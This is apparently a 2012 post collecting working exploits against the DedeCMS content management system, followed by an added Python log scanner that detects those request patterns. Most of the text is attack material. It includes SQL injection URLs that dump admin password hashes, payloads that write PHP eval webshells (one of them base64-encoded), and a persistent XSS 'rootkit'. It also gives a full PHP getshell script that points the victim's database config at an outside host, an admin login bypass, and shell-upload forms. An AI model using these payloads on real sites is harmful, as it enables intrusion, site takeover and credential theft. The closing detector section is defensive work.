DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload "software"; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, producing a one-line shell in one step.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below and open it to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar block URL-type XSS, so the XSS filter has to be disabled.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; however you then access any of the URLs below, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
    echo "\nExploit Success \n";
    if($aid==1)echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2)echo "\nShell:".$url."/$path/fuck.php\n";
    if($aid==3)echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "\nExploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
        return '';  // no connection, so there is nothing to read
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;  // only the first response line (status line) is inspected
    }
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value, and you go straight into the site backend.
The prerequisite for this vulnerability is that the backend path must be obtained first.

Dedecms 织梦 tag remote file write vulnerability
Prerequisite: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below, and the shell is 1.php in the same directory. Work out the principle yourselves...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the user management backend, publish an article, upload an image, then in attachment management replace the image with our carefully constructed template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the constructed part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 minus the first 5 characters and the last 7, giving a 20-character MD5 password; the method is: strip 3 from the front and 1 from the back to get the 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits an error raised by a MySQL numeric field overflow, combined with DEDECMS recording database error messages in a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
You can see the error message.
2. Visit
http://www.abc.com/data/mysql_error_trace.php
Seeing the following information proves the injection succeeded:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the address in the form's action is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the information from step 2 means the trojan file upload succeeded.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
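A defender-side access-log check, added here as an example and not part of the original post or of DedeCMS: it URL-decodes each request line and flags the request shapes this thread lists (GLOBALS overrides through _COOKIE/_POST arrays, raw SQL in advancedsearch.php, UNION/updatexml probes, traversal in oldface=/code=, script in gotopage=, and hits on data/mysql_error_trace.php). The rule names, the log format assumption (Common Log Format) and the sample lines are my own constructions.

```python
import re
from urllib.parse import unquote_plus

# Indicator rules derived from the request patterns listed in this thread.
# Each rule is (name, regex applied to the URL-decoded request target).
RULES = [
    # request-array override: _COOKIE[GLOBALS][cfg_*] / _POST[GLOBALS][cfg_*]
    ("globals_override", re.compile(r"_(cookie|post|get)\[globals\]\[cfg_", re.I)),
    # raw SQL handed to plus/advancedsearch.php in the sql= parameter
    ("advancedsearch_sql", re.compile(r"advancedsearch\.php\?.*\bsql=\s*select\b", re.I)),
    # UNION / error-based probes against plus/*.php (rss.php, feedback_js.php, infosearch.php)
    ("sql_injection", re.compile(r"plus/\w+\.php\?.*(union\s+select|updatexml\s*\(|from\s+dede_admin)", re.I)),
    # directory traversal in edit_face.php oldface= or carbuyaction.php code=
    ("path_traversal", re.compile(r"[?&](oldface|code)=[^&\s]*\.\./", re.I)),
    # reflected script in login.php gotopage=
    ("gotopage_xss", re.compile(r"login\.php\?.*gotopage=[^&\s]*<script", re.I)),
    # digg_frame.php mid= comment-close trick, or a fetch of the error-trace file it writes
    ("error_trace_write", re.compile(r"(digg_frame\.php\?.*mid=\*/|/data/mysql_error_trace\.php)", re.I)),
]

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def decode_request(target):
    """URL-decode the request target twice (double encoding is common) and drop NULs."""
    once = unquote_plus(target)
    return unquote_plus(once).replace("\x00", "")


def classify(line):
    """Return (client_ip, raw_target, [matched rule names]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _ts, _method, target, _status = m.groups()
    decoded = decode_request(target)
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return client, target, hits


def scan(lines):
    """Yield (client_ip, raw_target, hits) only for lines that trigger at least one rule."""
    for line in lines:
        res = classify(line)
        if res and res[2]:
            yield res


# Constructed sample access-log lines (illustrative values, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9 HTTP/1.1" 200 512
10.0.0.5 - - [18/Oct/2012:10:42:20 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048
10.0.0.7 - - [18/Oct/2012:10:43:01 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 64
10.0.0.8 - - [18/Oct/2012:10:44:10 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ex%3C/script%3E HTTP/1.1" 200 1024
10.0.0.9 - - [18/Oct/2012:10:45:00 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 4096
10.0.0.9 - - [18/Oct/2012:10:45:30 +0800] "GET /data/mysql_error_trace.php HTTP/1.1" 200 300
"""

if __name__ == "__main__":
    for client, target, hits in scan(SAMPLE_LOG.splitlines()):
        print(f"{client}  {','.join(hits)}  {target[:80]}")
```

The benign /plus/list.php line is deliberately included so the run shows that ordinary DedeCMS traffic is not flagged.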